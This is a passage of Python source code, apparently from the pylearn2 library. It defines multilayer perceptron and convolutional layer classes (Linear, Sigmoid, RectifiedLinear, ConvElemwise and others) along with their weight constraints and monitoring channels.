@wraps(Layer.get_weights_view_shape) def get_weights_view_shape(self): total = self.detector_layer_dim cols = self.pool_size if cols == 1: # Let the PatchViewer decide how to arrange the units # when they're not pooled raise NotImplementedError() # When they are pooled, make each pooling unit have one row rows = total / cols return rows, cols @wraps(Layer.get_weights_topo) def get_weights_topo(self): if not isinstance(self.input_space, Conv2DSpace): raise NotImplementedError() W, = self.transformer.get_params() W = W.T W = W.reshape((self.detector_layer_dim, self.input_space.shape[0], self.input_space.shape[1], self.input_space.num_channels)) W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c')) return function([], W)() @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, **kwargs): W, = self.transformer.get_params() assert W.ndim == 2 sq_W = T.sqr(W) row_norms = T.sqrt(sq_W.sum(axis=1)) col_norms = T.sqrt(sq_W.sum(axis=0)) rval = OrderedDict([('row_norms_min', row_norms.min()), ('row_norms_mean', row_norms.mean()), ('row_norms_max', row_norms.max()), ('col_norms_min', col_norms.min()), ('col_norms_mean', col_norms.mean()), ('col_norms_max', col_norms.max()), ]) if (state_below is not None) or (state is not None): if state is None: P = self.fprop(state_below) else: P = state if self.pool_size == 1: vars_and_prefixes = [(P, '')] else: vars_and_prefixes = [(P, 'p_')] for var, prefix in vars_and_prefixes: v_max = var.max(axis=0) v_min = var.min(axis=0) v_mean = var.mean(axis=0) v_range = v_max - v_min # max_x.mean_u is "the mean over *u*nits of the max over # e*x*amples" The x and u are included in the name because # otherwise its hard to remember which axis is which when # reading the monitor I use inner.outer rather than # outer_of_inner or something like that because I want # mean_x.* to appear next to each other in the alphabetical # list, as these are commonly plotted together for key, val in [('max_x.max_u', v_max.max()), ('max_x.mean_u', v_max.mean()), ('max_x.min_u', v_max.min()), ('min_x.max_u', v_min.max()), ('min_x.mean_u', v_min.mean()), ('min_x.min_u', v_min.min()), ('range_x.max_u', v_range.max()), ('range_x.mean_u', v_range.mean()), ('range_x.min_u', v_range.min()), ('mean_x.max_u', v_mean.max()), ('mean_x.mean_u', v_mean.mean()), ('mean_x.min_u', v_mean.min())]: rval[prefix + key] = val return rval @wraps(Layer.fprop) def fprop(self, state_below): self.input_space.validate(state_below) if self.requires_reformat: state_below = self.input_space.format_as(state_below, self.desired_space) z = self.transformer.lmul(state_below) + self.b if self.layer_name is not None: z.name = self.layer_name + '_z' p, h = max_pool_channels(z, self.pool_size) p.name = self.layer_name + '_p_' return p class Linear(Layer): """ A "linear model" in machine learning terminology. This would be more accurately described as an affine model because it adds an offset to the output as well as doing a matrix multiplication. The output is: output = T.dot(weights, input) + biases This class may be used as the output layer of an MLP for regression. It may also be used as a hidden layer. Most hidden layers classes are subclasses of this class that add apply a fixed nonlinearity to the output of the affine transformation provided by this class. One notable use of this class is to provide "bottleneck" layers. By using a Linear layer with few hidden units followed by a nonlinear layer such as RectifiedLinear with many hidden units, one essentially gets a RectifiedLinear layer with a factored weight matrix, which can reduce the number of parameters in the model (by making the effective weight matrix low rank). Parameters ---------- dim : int The number of elements in the output of the layer. layer_name : str The name of the layer. All layers in an MLP must have a unique name. irange : WRITEME istdev : WRITEME sparse_init : WRITEME sparse_stdev : WRITEME include_prob : float Probability of including a weight element in the set of weights initialized to U(-irange, irange). If not included it is initialized to 0. Anything that can be broadcasted to a numpy vector. Provides the initial value of the biases of the model. When using this class as an output layer (specifically the Linear class, or subclasses that don't change the output like LinearGaussian, but not subclasses that change the output, like Softmax) it can be a good idea to set this to the return value of the `mean_of_targets` function. This provides the mean value of all the targets in the training set, so the model is initialized to a dummy model that predicts the expected value of each output variable. W_lr_scale : float, optional Multiply the learning rate on the weights by this constant. b_lr_scale : float, optional Multiply the learning rate on the biases by this constant. mask_weights : ndarray, optional If provided, the weights will be multiplied by this mask after each learning update. max_row_norm : WRITEME max_col_norm : WRITEME min_col_norm : WRITEME copy_input : REMOVED use_abs_loss : bool, optional If True, the cost function will be mean absolute error rather than mean squared error. You can think of mean squared error as fitting a Gaussian distribution with variance 1, or as learning to predict the mean of the data. You can think of mean absolute error as fitting a Laplace distribution with variance 1, or as learning to predict the median of the data. use_bias : bool, optional If False, does not add the bias term to the output. """ def __init__(self, dim, layer_name, irange=None, istdev=None, sparse_init=None, sparse_stdev=1., include_prob=1.0, init_bias=0., W_lr_scale=None, b_lr_scale=None, mask_weights=None, max_row_norm=None, max_col_norm=None, min_col_norm=None, copy_input=None, use_abs_loss=False, use_bias=True): if copy_input is not None: raise AssertionError( "The copy_input option had a bug and has " "been removed from the library.") super(Linear, self).__init__() if use_bias and init_bias is None: init_bias = 0. self.__dict__.update(locals()) del self.self if use_bias: self.b = sharedX(np.zeros((self.dim,)) + init_bias, name=(layer_name + '_b')) else: assert b_lr_scale is None init_bias is None @wraps(Layer.get_lr_scalers) def get_lr_scalers(self): if not hasattr(self, 'W_lr_scale'): self.W_lr_scale = None if not hasattr(self, 'b_lr_scale'): self.b_lr_scale = None rval = OrderedDict() if self.W_lr_scale is not None: W, = self.transformer.get_params() rval[W] = self.W_lr_scale if self.b_lr_scale is not None: rval[self.b] = self.b_lr_scale return rval @wraps(Layer.set_input_space) def set_input_space(self, space): self.input_space = space if isinstance(space, VectorSpace): self.requires_reformat = False self.input_dim = space.dim else: self.requires_reformat = True self.input_dim = space.get_total_dimension() self.desired_space = VectorSpace(self.input_dim) self.output_space = VectorSpace(self.dim) rng = self.mlp.rng if self.irange is not None: assert self.istdev is None assert self.sparse_init is None W = rng.uniform(-self.irange, self.irange, (self.input_dim, self.dim)) * \ (rng.uniform(0., 1., (self.input_dim, self.dim)) < self.include_prob) elif self.istdev is not None: assert self.sparse_init is None W = rng.randn(self.input_dim, self.dim) * self.istdev else: assert self.sparse_init is not None W = np.zeros((self.input_dim, self.dim)) def mask_rejects(idx, i): if self.mask_weights is None: return False return self.mask_weights[idx, i] == 0. for i in xrange(self.dim): assert self.sparse_init <= self.input_dim for j in xrange(self.sparse_init): idx = rng.randint(0, self.input_dim) while W[idx, i] != 0 or mask_rejects(idx, i): idx = rng.randint(0, self.input_dim) W[idx, i] = rng.randn() W *= self.sparse_stdev W = sharedX(W) W.name = self.layer_name + '_W' self.transformer = MatrixMul(W) W, = self.transformer.get_params() assert W.name is not None if self.mask_weights is not None: expected_shape = (self.input_dim, self.dim) if expected_shape != self.mask_weights.shape: raise ValueError("Expected mask with shape " + str(expected_shape) + " but got " + str(self.mask_weights.shape)) self.mask = sharedX(self.mask_weights) @wraps(Layer._modify_updates) def _modify_updates(self, updates): if self.mask_weights is not None: W, = self.transformer.get_params() if W in updates: updates[W] = updates[W] * self.mask if self.max_row_norm is not None: W, = self.transformer.get_params() if W in updates: updated_W = updates[W] row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1)) desired_norms = T.clip(row_norms, 0, self.max_row_norm) scales = desired_norms / (1e-7 + row_norms) updates[W] = updated_W * scales.dimshuffle(0, 'x') if self.max_col_norm is not None or self.min_col_norm is not None: assert self.max_row_norm is None if self.max_col_norm is not None: max_col_norm = self.max_col_norm if self.min_col_norm is None: self.min_col_norm = 0 W, = self.transformer.get_params() if W in updates: updated_W = updates[W] col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0)) if self.max_col_norm is None: max_col_norm = col_norms.max() desired_norms = T.clip(col_norms, self.min_col_norm, max_col_norm) updates[W] = updated_W * desired_norms / (1e-7 + col_norms) @wraps(Layer.get_params) def get_params(self): W, = self.transformer.get_params() assert W.name is not None rval = self.transformer.get_params() assert not isinstance(rval, set) rval = list(rval) if self.use_bias: assert self.b.name is not None assert self.b not in rval rval.append(self.b) return rval @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * T.sqr(W).sum() @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * abs(W).sum() @wraps(Layer.get_weights) def get_weights(self): if self.requires_reformat: # This is not really an unimplemented case. # We actually don't know how to format the weights # in design space. We got the data in topo space # and we don't have access to the dataset raise NotImplementedError() W, = self.transformer.get_params() W = W.get_value() return W @wraps(Layer.set_weights) def set_weights(self, weights): W, = self.transformer.get_params() W.set_value(weights) @wraps(Layer.set_biases) def set_biases(self, biases): self.b.set_value(biases) @wraps(Layer.get_biases) def get_biases(self): """ .. todo:: WRITEME """ return self.b.get_value() @wraps(Layer.get_weights_format) def get_weights_format(self): return ('v', 'h') @wraps(Layer.get_weights_topo) def get_weights_topo(self): if not isinstance(self.input_space, Conv2DSpace): raise NotImplementedError() W, = self.transformer.get_params() W = W.T W = W.reshape((self.dim, self.input_space.shape[0], self.input_space.shape[1], self.input_space.num_channels)) W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c')) return function([], W)() @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): W, = self.transformer.get_params() assert W.ndim == 2 sq_W = T.sqr(W) row_norms = T.sqrt(sq_W.sum(axis=1)) col_norms = T.sqrt(sq_W.sum(axis=0)) rval = OrderedDict([('row_norms_min', row_norms.min()), ('row_norms_mean', row_norms.mean()), ('row_norms_max', row_norms.max()), ('col_norms_min', col_norms.min()), ('col_norms_mean', col_norms.mean()), ('col_norms_max', col_norms.max()), ]) if (state is not None) or (state_below is not None): if state is None: state = self.fprop(state_below) mx = state.max(axis=0) mean = state.mean(axis=0) mn = state.min(axis=0) rg = mx - mn rval['range_x_max_u'] = rg.max() rval['range_x_mean_u'] = rg.mean() rval['range_x_min_u'] = rg.min() rval['max_x_max_u'] = mx.max() rval['max_x_mean_u'] = mx.mean() rval['max_x_min_u'] = mx.min() rval['mean_x_max_u'] = mean.max() rval['mean_x_mean_u'] = mean.mean() rval['mean_x_min_u'] = mean.min() rval['min_x_max_u'] = mn.max() rval['min_x_mean_u'] = mn.mean() rval['min_x_min_u'] = mn.min() return rval def _linear_part(self, state_below): """ Parameters ---------- state_below : member of input_space Returns ------- output : theano matrix Affine transformation of state_below """ self.input_space.validate(state_below) if self.requires_reformat: state_below = self.input_space.format_as(state_below, self.desired_space) z = self.transformer.lmul(state_below) if self.use_bias: z += self.b if self.layer_name is not None: z.name = self.layer_name + '_z' return z @wraps(Layer.fprop) def fprop(self, state_below): p = self._linear_part(state_below) return p @wraps(Layer.cost) def cost(self, Y, Y_hat): return self.cost_from_cost_matrix(self.cost_matrix(Y, Y_hat)) @wraps(Layer.cost_from_cost_matrix) def cost_from_cost_matrix(self, cost_matrix): return cost_matrix.sum(axis=1).mean() @wraps(Layer.cost_matrix) def cost_matrix(self, Y, Y_hat): if(self.use_abs_loss): return T.abs_(Y - Y_hat) else: return T.sqr(Y - Y_hat) class Tanh(Linear): """ A layer that performs an affine transformation of its (vectorial) input followed by a hyperbolic tangent elementwise nonlinearity. Parameters ---------- kwargs : dict Keyword arguments to pass through to `Linear` class constructor. """ @wraps(Layer.fprop) def fprop(self, state_below): p = self._linear_part(state_below) p = T.tanh(p) return p @wraps(Layer.cost) def cost(self, *args, **kwargs): raise NotImplementedError() class Sigmoid(Linear): """ A layer that performs an affine transformation of its input followed by a logistic sigmoid elementwise nonlinearity. Parameters ---------- monitor_style : string Values can be any of ['detection', 'one_hot_class', 'bit_vector_class'] 'detection' is the default. - 'detection' : get_monitor_from_state makes no assumptions about target, reports info about how good model is at detecting positive bits. This will monitor precision, recall, and F1 score based on a detection threshold of 0.5. Note that these quantities are computed *per-minibatch* and averaged together. Unless your entire monitoring dataset fits in one minibatch, this is not the same as the true F1 score, etc., and will usually seriously overestimate your performance. - 'one_hot_class' : get_monitor_from_state assumes target is one-hot class indicator, even though you're training the model as k independent sigmoids. Gives info on how good the argmax over the sigmoids behaves as a classifier. - 'bit_vector_class' : get_monitor_from_state treats each sigmoid as predicting a 1 iff its value is > 0.5. Each example is counted as correct iff all of the bits in its target are predicted correctly. This includes as a special case the situation where the target is a single 0 or 1 label. - 'classification' : deprecated; originally this string was used for 'one_hot_class', then due to a miscommunication it was changed to be used for 'bit_vector_class'. kwargs : dict Passed through to the Layer class constructor """ def __init__(self, monitor_style='detection', **kwargs): super(Sigmoid, self).__init__(**kwargs) if monitor_style == 'classification': monitor_style = 'bit_vector_class' warnings.warn("The 'classification' monitor style is deprecated." " Switch to 'bit_vector_class' (or possibly" " 'one_hot_class' if your code predates 8f4b62b3df)." " 'classification' may be removed on or after " "2015-04-21.") assert monitor_style in ['one_hot_class', 'bit_vector_class', 'detection'] self.monitor_style = monitor_style @wraps(Layer.fprop) def fprop(self, state_below): p = self._linear_part(state_below) p = T.nnet.sigmoid(p) return p @wraps(Layer.cost) def cost(self, Y, Y_hat): """ Returns a batch (vector) of mean across units of KL divergence for each example. Parameters ---------- Y : theano.gof.Variable Targets Y_hat : theano.gof.Variable Output of `fprop` mean across units, mean across batch of KL divergence Notes ----- Uses KL(P || Q) where P is defined by Y and Q is defined by Y_hat Currently Y must be purely binary. If it's not, you'll still get the right gradient, but the value in the monitoring channel will be wrong. Y_hat must be generated by fprop, i.e., it must be a symbolic sigmoid. p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q) For binary p, some terms drop out: - p log q - (1-p) log (1-q) - p log sigmoid(z) - (1-p) log sigmoid(-z) p softplus(-z) + (1-p) softplus(z) """ total = self.kl(Y=Y, Y_hat=Y_hat) ave = total.mean() return ave def kl(self, Y, Y_hat): """ Computes the KL divergence. Parameters ---------- Y : Variable targets for the sigmoid outputs. Currently Y must be purely binary. If it's not, you'll still get the right gradient, but the value in the monitoring channel will be wrong. Y_hat : Variable predictions made by the sigmoid layer. Y_hat must be generated by fprop, i.e., it must be a symbolic sigmoid. Returns ------- ave : Variable average kl divergence between Y and Y_hat. Notes ----- Warning: This function expects a sigmoid nonlinearity in the output layer and it uses kl function under pylearn2/expr/nnet/. Returns a batch (vector) of mean across units of KL divergence for each example, KL(P || Q) where P is defined by Y and Q is defined by Y_hat: p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q) For binary p, some terms drop out: - p log q - (1-p) log (1-q) - p log sigmoid(z) - (1-p) log sigmoid(-z) p softplus(-z) + (1-p) softplus(z) """ batch_axis = self.output_space.get_batch_axis() div = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis) return div @wraps(Layer.cost_matrix) def cost_matrix(self, Y, Y_hat): rval = elemwise_kl(Y, Y_hat) assert rval.ndim == 2 return rval def get_detection_channels_from_state(self, state, target): """ Returns monitoring channels when using the layer to do detection of binary events. Parameters ---------- state : theano.gof.Variable Output of `fprop` target : theano.gof.Variable The targets from the dataset Returns ------- channels : OrderedDict Dictionary mapping channel names to Theano channel values. """ rval = OrderedDict() y_hat = state > 0.5 y = target > 0.5 wrong_bit = T.cast(T.neq(y, y_hat), state.dtype) rval['01_loss'] = wrong_bit.mean() rval['kl'] = self.cost(Y_hat=state, Y=target) y = T.cast(y, state.dtype) y_hat = T.cast(y_hat, state.dtype) tp = (y * y_hat).sum() fp = ((1 - y) * y_hat).sum() precision = compute_precision(tp, fp) recall = compute_recall(y, tp) f1 = compute_f1(precision, recall) rval['precision'] = precision rval['recall'] = recall rval['f1'] = f1 tp = (y * y_hat).sum(axis=0) fp = ((1 - y) * y_hat).sum(axis=0) precision = compute_precision(tp, fp) rval['per_output_precision_max'] = precision.max() rval['per_output_precision_mean'] = precision.mean() rval['per_output_precision_min'] = precision.min() recall = compute_recall(y, tp) rval['per_output_recall_max'] = recall.max() rval['per_output_recall_mean'] = recall.mean() rval['per_output_recall_min'] = recall.min() f1 = compute_f1(precision, recall) rval['per_output_f1_max'] = f1.max() rval['per_output_f1_mean'] = f1.mean() rval['per_output_f1_min'] = f1.min() return rval @wraps(Layer.get_layer_monitoring_channels) def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): rval = super(Sigmoid, self).get_layer_monitoring_channels( state=state, targets=targets) if (targets is not None) and \ ((state_below is not None) or (state is not None)): if state is None: state = self.fprop(state_below) if self.monitor_style == 'detection': rval.update(self.get_detection_channels_from_state(state, targets)) elif self.monitor_style == 'one_hot_class': # For this monitor style, we know (by assumption) that # exactly one bit is always on, so we pick # the single most likely bit under the model, regardless # of whether its probability exceeds 0.5 prediction = state.argmax(axis=1) labels = targets.argmax(axis=1) incorrect = T.neq(prediction, labels) misclass = T.cast(incorrect, config.floatX).mean() rval['misclass'] = misclass else: assert self.monitor_style == 'bit_vector_class' # Threshold Y_hat at 0.5. prediction = T.gt(state, 0.5) # If even one feature is wrong for a given training example, # it's considered incorrect, so we max over columns. incorrect = T.neq(targets, prediction).max(axis=1) rval['misclass'] = T.cast(incorrect, config.floatX).mean() return rval class RectifiedLinear(Linear): """ Rectified linear MLP layer (Glorot and Bengio 2011). Parameters ---------- left_slope : float The slope the line should have left of 0. kwargs : dict Keyword arguments to pass to `Linear` class constructor. """ def __init__(self, left_slope=0.0, **kwargs): super(RectifiedLinear, self).__init__(**kwargs) self.left_slope = left_slope @wraps(Layer.fprop) def fprop(self, state_below): p = self._linear_part(state_below) # Original: p = p * (p > 0.) + self.left_slope * p * (p < 0.) # T.switch is faster. # For details, see benchmarks in # pylearn2/scripts/benchmark/time_relu.py p = T.switch(p > 0., p, self.left_slope * p) return p @wraps(Layer.cost) def cost(self, *args, **kwargs): raise NotImplementedError() class Softplus(Linear): """ An MLP layer using the softplus nonlinearity h = log(1 + exp(Wx + b)) Parameters ---------- kwargs : dict Keyword arguments to `Linear` constructor. """ def __init__(self, **kwargs): super(Softplus, self).__init__(**kwargs) @wraps(Layer.fprop) def fprop(self, state_below): p = self._linear_part(state_below) p = T.nnet.softplus(p) return p @wraps(Layer.cost) def cost(self, *args, **kwargs): raise NotImplementedError() class SpaceConverter(Layer): """ A Layer with no parameters that converts the input from one space to another. Parameters ---------- layer_name : str Name of the layer. output_space : Space The space to convert to. """ def __init__(self, layer_name, output_space): super(SpaceConverter, self).__init__() self.__dict__.update(locals()) del self.self self._params = [] @wraps(Layer.set_input_space) def set_input_space(self, space): self.input_space = space @wraps(Layer.fprop) def fprop(self, state_below): return self.input_space.format_as(state_below, self.output_space) class ConvNonlinearity(object): """ Abstract convolutional nonlinearity class. """ def apply(self, linear_response): """ Applies the nonlinearity over the convolutional layer. Parameters ---------- linear_response: Variable linear response of the layer. Returns ------- p: Variable the response of the layer after the activation function is applied over. """ p = linear_response return p def _get_monitoring_channels_for_activations(self, state): """ Computes the monitoring channels which does not require targets. Parameters ---------- state : member of self.output_space A minibatch of states that this Layer took on during fprop. Provided externally so that we don't need to make a second expression for it. This helps keep the Theano graph smaller so that function compilation runs faster. Returns ------- rval : OrderedDict A dictionary mapping channel names to monitoring channels of interest for this layer. """ rval = OrderedDict({}) mx = state.max(axis=0) mean = state.mean(axis=0) mn = state.min(axis=0) rg = mx - mn rval['range_x_max_u'] = rg.max() rval['range_x_mean_u'] = rg.mean() rval['range_x_min_u'] = rg.min() rval['max_x_max_u'] = mx.max() rval['max_x_mean_u'] = mx.mean() rval['max_x_min_u'] = mx.min() rval['mean_x_max_u'] = mean.max() rval['mean_x_mean_u'] = mean.mean() rval['mean_x_min_u'] = mean.min() rval['min_x_max_u'] = mn.max() rval['min_x_mean_u'] = mn.mean() rval['min_x_min_u'] = mn.min() return rval def get_monitoring_channels_from_state(self, state, target, cost_fn=None): """ Override the default get_monitoring_channels_from_state function. Parameters ---------- state : member of self.output_space A minibatch of states that this Layer took on during fprop. Provided externally so that we don't need to make a second expression for it. This helps keep the Theano graph smaller so that function compilation runs faster. target : member of self.output_space Should be None unless this is the last layer. If specified, it should be a minibatch of targets for the last layer. cost_fn : theano computational graph or None This is the theano computational graph of a cost function. Returns ------- rval : OrderedDict A dictionary mapping channel names to monitoring channels of interest for this layer. """ rval = self._get_monitoring_channels_for_activations(state) return rval class IdentityConvNonlinearity(ConvNonlinearity): """ Linear convolutional nonlinearity class. """ def __init__(self): self.non_lin_name = "linear" @wraps(ConvNonlinearity.get_monitoring_channels_from_state) def get_monitoring_channels_from_state(self, state, target, cost_fn=False): rval = super(IdentityConvNonlinearity, self).get_monitoring_channels_from_state(state, target, cost_fn) if target is not None: prediction = T.gt(state, 0.5) incorrect = T.new(target, prediction).max(axis=1) rval["misclass"] = T.cast(incorrect, config.floatX).mean() return rval class RectifierConvNonlinearity(ConvNonlinearity): """ A simple rectifier nonlinearity class for convolutional layers. Parameters ---------- left_slope : float The slope of the left half of the activation function. """ def __init__(self, left_slope=0.0): """ Parameters ---------- left_slope : float, optional left slope for the linear response of the rectifier function. default is 0.0. """ self.non_lin_name = "rectifier" self.left_slope = left_slope @wraps(ConvNonlinearity.apply) def apply(self, linear_response): """ Applies the rectifier nonlinearity over the convolutional layer. """ p = linear_response * (linear_response > 0.) + self.left_slope *\ linear_response * (linear_response < 0.) return p class SigmoidConvNonlinearity(ConvNonlinearity): """ Sigmoid nonlinearity class for convolutional layers. Parameters ---------- monitor_style : str, optional default monitor_style is "classification". This determines whether to do classification or detection. """ def __init__(self, monitor_style="classification"): assert monitor_style in ['classification', 'detection'] self.monitor_style = monitor_style self.non_lin_name = "sigmoid" @wraps(ConvNonlinearity.apply) def apply(self, linear_response): """ Applies the sigmoid nonlinearity over the convolutional layer. """ rval = OrderedDict() p = T.nnet.sigmoid(linear_response) return p @wraps(ConvNonlinearity.get_monitoring_channels_from_state) def get_monitoring_channels_from_state(self, state, target, cost_fn=None): rval = super(SigmoidConvNonlinearity, self).get_monitoring_channels_from_state(state, target, cost_fn) if target is not None: y_hat = state > 0.5 y = target > 0.5 wrong_bit = T.cast(T.neq(y, y_hat), state.dtype) rval['01_loss'] = wrong_bit.mean() rval['kl'] = cost_fn(Y_hat=state, Y=target) y = T.cast(y, state.dtype) y_hat = T.cast(y_hat, state.dtype) tp = (y * y_hat).sum() fp = ((1 - y) * y_hat).sum() precision = compute_precision(tp, fp) recall = compute_recall(y, tp) f1 = compute_f1(precision, recall) rval['precision'] = precision rval['recall'] = recall rval['f1'] = f1 tp = (y * y_hat).sum(axis=[0, 1]) fp = ((1 - y) * y_hat).sum(axis=[0, 1]) precision = compute_precision(tp, fp) rval['per_output_precision_max'] = precision.max() rval['per_output_precision_mean'] = precision.mean() rval['per_output_precision_min'] = precision.min() recall = compute_recall(y, tp) rval['per_output_recall_max'] = recall.max() rval['per_output_recall_mean'] = recall.mean() rval['per_output_recall_min'] = recall.min() f1 = compute_f1(precision, recall) rval['per_output_f1_max'] = f1.max() rval['per_output_f1_mean'] = f1.mean() rval['per_output_f1_min'] = f1.min() return rval class TanhConvNonlinearity(ConvNonlinearity): """ Tanh nonlinearity class for convolutional layers. """ def __init__(self): self.non_lin_name = "tanh" @wraps(ConvNonlinearity.apply) def apply(self, linear_response): """ Applies the tanh nonlinearity over the convolutional layer. """ p = T.tanh(linear_response) return p class ConvElemwise(Layer): """ Generic convolutional elemwise layer. Takes the ConvNonlinearity object as an argument and implements convolutional layer with the specified nonlinearity. This function can implement: * Linear convolutional layer * Rectifier convolutional layer * Sigmoid convolutional layer * Tanh convolutional layer based on the nonlinearity argument that it recieves. Parameters ---------- output_channels : int The number of output channels the layer should have. kernel_shape : tuple The shape of the convolution kernel. pool_shape : tuple The shape of the spatial max pooling. A two-tuple of ints. pool_stride : tuple The stride of the spatial max pooling. Also must be square. layer_name : str A name for this layer that will be prepended to monitoring channels related to this layer. nonlinearity : object An instance of a nonlinearity object which might be inherited from the ConvNonlinearity class. irange : float, optional if specified, initializes each weight randomly in U(-irange, irange) border_mode : str, optional A string indicating the size of the output: - "full" : The output is the full discrete linear convolution of the inputs. - "valid" : The output consists only of those elements that do not rely on the zero-padding. (Default) sparse_init : WRITEME include_prob : float, optional probability of including a weight element in the set of weights initialized to U(-irange, irange). If not included it is initialized to 1.0. init_bias : float, optional All biases are initialized to this number. Default is 0. W_lr_scale : float or None The learning rate on the weights for this layer is multiplied by this scaling factor b_lr_scale : float or None The learning rate on the biases for this layer is multiplied by this scaling factor max_kernel_norm : float or None If specified, each kernel is constrained to have at most this norm. pool_type : str or None The type of the pooling operation performed the convolution. Default pooling type is max-pooling. tied_b : bool, optional If true, all biases in the same channel are constrained to be the same as each other. Otherwise, each bias at each location is learned independently. Default is true. detector_normalization : callable or None See `output_normalization`. If pooling argument is not provided, detector_normalization is not applied on the layer. output_normalization : callable or None if specified, should be a callable object. the state of the network is optionally replaced with normalization(state) at each of the 3 points in processing: - detector: the maxout units can be normalized prior to the spatial pooling - output: the output of the layer, after sptial pooling, can be normalized as well kernel_stride : 2-tuple of ints, optional The stride of the convolution kernel. Default is (1, 1). """ def __init__(self, output_channels, kernel_shape, layer_name, nonlinearity, irange=None, border_mode='valid', sparse_init=None, include_prob=1.0, init_bias=0., W_lr_scale=None, b_lr_scale=None, max_kernel_norm=None, pool_type=None, pool_shape=None, pool_stride=None, tied_b=None, detector_normalization=None, output_normalization=None, kernel_stride=(1, 1), monitor_style="classification"): super(ConvElemwise, self).__init__() if (irange is None) and (sparse_init is None): raise AssertionError("You should specify either irange or " "sparse_init when calling the constructor of " "ConvElemwise.") elif (irange is not None) and (sparse_init is not None): raise AssertionError("You should specify either irange or " "sparse_init when calling the constructor of " "ConvElemwise and not both.") if pool_type is not None: assert pool_shape is not None, ( "You should specify the shape of " "the spatial %s-pooling." % pool_type) assert pool_stride is not None, ( "You should specify the strides of " "the spatial %s-pooling." % pool_type) assert nonlinearity is not None self.nonlin = nonlinearity self.__dict__.update(locals()) assert monitor_style in ['classification', 'detection'], ( "%s.monitor_style should be either" "detection or classification" % self.__class__.__name__) del self.self def initialize_transformer(self, rng): """ This function initializes the transformer of the class. Re-running this function will reset the transformer. Parameters ---------- rng : object random number generator object. """ if self.irange is not None: assert self.sparse_init is None self.transformer = conv2d.make_random_conv2D( irange=self.irange, input_space=self.input_space, output_space=self.detector_space, kernel_shape=self.kernel_shape, subsample=self.kernel_stride, border_mode=self.border_mode, rng=rng) elif self.sparse_init is not None: self.transformer = conv2d.make_sparse_random_conv2D( num_nonzero=self.sparse_init, input_space=self.input_space, output_space=self.detector_space, kernel_shape=self.kernel_shape, subsample=self.kernel_stride, border_mode=self.border_mode, rng=rng) def initialize_output_space(self): """ Initializes the output space of the ConvElemwise layer by taking pooling operator and the hyperparameters of the convolutional layer into consideration as well. """ dummy_batch_size = self.mlp.batch_size if dummy_batch_size is None: dummy_batch_size = 2 dummy_detector =\ sharedX(self.detector_space.get_origin_batch(dummy_batch_size)) if self.pool_type is not None: assert self.pool_type in ['max', 'mean'] if self.pool_type == 'max': dummy_p = max_pool(bc01=dummy_detector, pool_shape=self.pool_shape, pool_stride=self.pool_stride, image_shape=self.detector_space.shape) elif self.pool_type == 'mean': dummy_p = mean_pool(bc01=dummy_detector, pool_shape=self.pool_shape, pool_stride=self.pool_stride, image_shape=self.detector_space.shape) dummy_p = dummy_p.eval() self.output_space = Conv2DSpace(shape=[dummy_p.shape[2], dummy_p.shape[3]], num_channels=self.output_channels, axes=('b', 'c', 0, 1)) else: dummy_detector = dummy_detector.eval() self.output_space = Conv2DSpace(shape=[dummy_detector.shape[2], dummy_detector.shape[3]], num_channels=self.output_channels, axes=('b', 'c', 0, 1)) logger.info('Output space: {0}'.format(self.output_space.shape)) @wraps(Layer.set_input_space) def set_input_space(self, space): """ Note: this function will reset the parameters! """ self.input_space = space if not isinstance(space, Conv2DSpace): raise BadInputSpaceError(self.__class__.__name__ + ".set_input_space " "expected a Conv2DSpace, got " + str(space) + " of type " + str(type(space))) rng = self.mlp.rng if self.border_mode == 'valid': output_shape = [int((self.input_space.shape[0] - self.kernel_shape[0]) / self.kernel_stride[0]) + 1, int((self.input_space.shape[1] - self.kernel_shape[1]) / self.kernel_stride[1]) + 1] elif self.border_mode == 'full': output_shape = [int((self.input_space.shape[0] + self.kernel_shape[0]) / self.kernel_stride[0]) - 1, int((self.input_space.shape[1] + self.kernel_shape[1]) / self.kernel_stride[1]) - 1] self.detector_space = Conv2DSpace(shape=output_shape, num_channels=self.output_channels, axes=('b', 'c', 0, 1)) self.initialize_transformer(rng) W, = self.transformer.get_params() W.name = self.layer_name + '_W' if self.tied_b: self.b = sharedX(np.zeros((self.detector_space.num_channels)) + self.init_bias) else: self.b = sharedX(self.detector_space.get_origin() + self.init_bias) self.b.name = self.layer_name + '_b' logger.info('Input shape: {0}'.format(self.input_space.shape)) logger.info('Detector space: {0}'.format(self.detector_space.shape)) self.initialize_output_space() @wraps(Layer._modify_updates) def _modify_updates(self, updates): if self.max_kernel_norm is not None: W, = self.transformer.get_params() if W in updates: updated_W = updates[W] row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=(1, 2, 3))) desired_norms = T.clip(row_norms, 0, self.max_kernel_norm) updates[W] = updated_W * ( desired_norms / (1e-7 + row_norms)).dimshuffle(0, 'x', 'x', 'x') @wraps(Layer.get_params) def get_params(self): assert self.b.name is not None W, = self.transformer.get_params() assert W.name is not None rval = self.transformer.get_params() assert not isinstance(rval, set) rval = list(rval) assert self.b not in rval rval.append(self.b) return rval @wraps(Layer.get_weight_decay) def get_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * T.sqr(W).sum() @wraps(Layer.get_l1_weight_decay) def get_l1_weight_decay(self, coeff): if isinstance(coeff, str): coeff = float(coeff) assert isinstance(coeff, float) or hasattr(coeff, 'dtype') W, = self.transformer.get_params() return coeff * abs(W).sum() @wraps(Layer.set_weights) def set_weights(self, weights): W, = self.transformer.get_params() W.set_value(weights) @wraps(Layer.set_biases) def 